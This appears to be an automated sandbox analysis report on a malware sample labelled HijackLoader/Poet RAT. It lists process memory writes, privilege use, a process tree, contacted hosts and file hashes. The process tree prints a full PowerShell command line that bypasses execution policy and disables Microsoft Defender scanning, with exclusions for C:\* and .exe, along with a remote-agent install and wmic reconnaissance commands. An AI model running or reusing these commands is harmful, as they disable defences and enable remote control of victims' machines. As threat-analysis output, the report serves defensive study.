N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4304 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4304 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4304 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4304 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3660 wrote to memory of 4044 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3660 wrote to memory of 4044 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3660 wrote to memory of 4044 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3660 wrote to memory of 4044 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 2532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4044 wrote to memory of 2532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4044 wrote to memory of 2532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4044 wrote to memory of 2532 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2532 wrote to memory of 3976 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2532 wrote to memory of 3976 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2532 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\naver\naver.exe
PID 2532 wrote to memory of 5036 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\naver\naver.exe
PID 2192 wrote to memory of 692 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\System32\wbem\wmic.exe
PID 2192 wrote to memory of 692 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\System32\wbem\wmic.exe
PID 2192 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\system32\wbem\wmic.exe
PID 2192 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\system32\wbem\wmic.exe
PID 2192 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\System32\wbem\wmic.exe
PID 2192 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\System32\wbem\wmic.exe
PID 2192 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\system32\wbem\wmic.exe
PID 2192 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\system32\wbem\wmic.exe
PID 2192 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\System32\wbem\wmic.exe
PID 2192 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\System32\wbem\wmic.exe
PID 2192 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\System32\wbem\wmic.exe
PID 2192 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\System32\wbem\wmic.exe
PID 2192 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2192 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\naver\naver.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe

"C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3836,i,11391966286255097843,10588851088187498028,262144 --variations-seed-version --mojo-platform-channel-handle=4348 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"

C:\Users\Admin\AppData\Local\naver\naver.exe

C:\Users\Admin\AppData\Local\naver\naver.exe -install

C:\Users\Admin\AppData\Local\naver\naver.exe

"C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"

C:\Windows\System32\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\system32\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\System32\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\system32\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\System32\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\System32\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -noprofile -nologo -command -

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.logflare.app udp
US 172.67.144.216:443 api.logflare.app tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 216.144.67.172.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ubiquitous-cucurucho-343e97.netlify.app udp
DE 3.72.140.173:443 ubiquitous-cucurucho-343e97.netlify.app tcp
US 8.8.8.8:53 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev udp
US 172.67.144.216:443 api.logflare.app tcp
US 172.66.0.235:443 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev tcp
US 8.8.8.8:53 173.140.72.3.in-addr.arpa udp
US 8.8.8.8:53 te.legra.ph udp
NL 149.154.164.13:443 te.legra.ph tcp
US 8.8.8.8:53 235.0.66.172.in-addr.arpa udp
US 8.8.8.8:53 13.164.154.149.in-addr.arpa udp
US 8.8.8.8:53 cdn.jsdelivr.net udp
US 172.67.144.216:443 api.logflare.app tcp
US 172.67.144.216:443 api.logflare.app tcp
US 172.67.144.216:443 api.logflare.app tcp
US 172.66.0.235:443 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev tcp
US 172.66.0.235:443 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev tcp
US 151.101.193.229:443 cdn.jsdelivr.net tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 229.193.101.151.in-addr.arpa udp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 sktelecom.netlify.app udp
US 172.67.144.216:443 api.logflare.app tcp
US 172.67.144.216:443 api.logflare.app tcp
US 172.67.144.216:443 api.logflare.app tcp
DE 52.58.254.253:443 sktelecom.netlify.app tcp
US 8.8.8.8:53 api.skt.cam udp
US 172.67.147.63:443 api.skt.cam tcp
US 8.8.8.8:53 253.254.58.52.in-addr.arpa udp
US 8.8.8.8:53 microsoft.devq.workers.dev udp
US 104.21.61.174:443 microsoft.devq.workers.dev tcp
US 8.8.8.8:53 63.147.67.172.in-addr.arpa udp
US 8.8.8.8:53 174.61.21.104.in-addr.arpa udp
US 8.8.8.8:53 sktelecom.duckdns.org udp
KR 203.234.238.140:443 sktelecom.duckdns.org tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 140.238.234.203.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

memory/3660-1-0x00007FFEC0003000-0x00007FFEC0005000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_21kxgm1v.tpz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3660-7-0x000001DAD2350000-0x000001DAD2372000-memory.dmp

memory/3660-12-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

memory/3660-13-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

memory/3660-14-0x000001DAD2BC0000-0x000001DAD2C04000-memory.dmp

memory/2064-15-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

memory/2064-16-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

memory/2064-17-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

memory/3660-27-0x000001DAD2C90000-0x000001DAD2D06000-memory.dmp

memory/2064-30-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

memory/3660-31-0x00007FFEC0003000-0x00007FFEC0005000-memory.dmp

memory/3660-32-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

memory/3660-33-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e89c193840c8fb53fc3de104b1c4b092
SHA1 8b41b6a392780e48cc33e673cf4412080c42981e
SHA256 920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c
SHA512 865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 a26df49623eff12a70a93f649776dab7
SHA1 efb53bd0df3ac34bd119adf8788127ad57e53803
SHA256 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512 e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

memory/3660-52-0x00007FFEC0000000-0x00007FFEC0AC1000-memory.dmp

C:\Users\Admin\AppData\Local\naver\naver.exe

MD5 c41e8324cb68c07c2bbff56d645cae53
SHA1 13518a95a782ea595aff1e7f15397d2968738718
SHA256 4f9f9cc3996b3f8ee33b46263ad726085ee4f06520012bcfb6a2df77ecdb7917
SHA512 7b2271be16d9729c32398b62299c5526dc6c9d98ef3213513554eb46f21917f50ab4b82b5e83ca83582c3b570e8a79713d2bf0779162d687aebbd3b47dd0900b

C:\Users\Admin\AppData\Local\naver\naver.msh

MD5 2dd515ea546a81398d94dd15e3b4d55c
SHA1 eb0b0fca721a296906166b7e972559b87353b726
SHA256 becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2
SHA512 439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb